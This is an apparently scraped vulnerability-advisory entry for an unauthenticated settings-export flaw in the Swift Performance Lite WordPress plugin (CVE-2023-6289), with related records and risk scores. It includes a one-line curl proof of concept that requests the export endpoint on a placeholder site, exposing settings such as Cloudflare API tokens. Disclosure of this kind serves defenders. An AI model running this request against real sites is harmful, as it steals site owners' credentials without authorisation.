Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:8C83DD57-9291-4DFC-846D-5AD47534E2ADHistoryNov 27, 2023 - 12:00 a.m.
Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export
2023-11-2700:00:00
Krzysztof Zając (CERT PL)
41
swift performance lite
unauthenticated
configuration export
vulnerability
curl
exploit
admin-post.
Description The plugin does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens.
curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export'Related
nvd
nvd
CVE-2023-6289
2023-12-18 20:15:08
cve
cve
CVE-2023-6289
2023-12-18 20:15:08
prion
prion
Information disclosure
2023-12-18 20:15:00
cvelist
cvelist
wpvulndb
wpvulndb
Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export
2023-11-27 00:00:00
wordfence
wordfence
8.6 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.2%
Related for WPEX-ID:8C83DD57-9291-4DFC-846D-5AD47534E2AD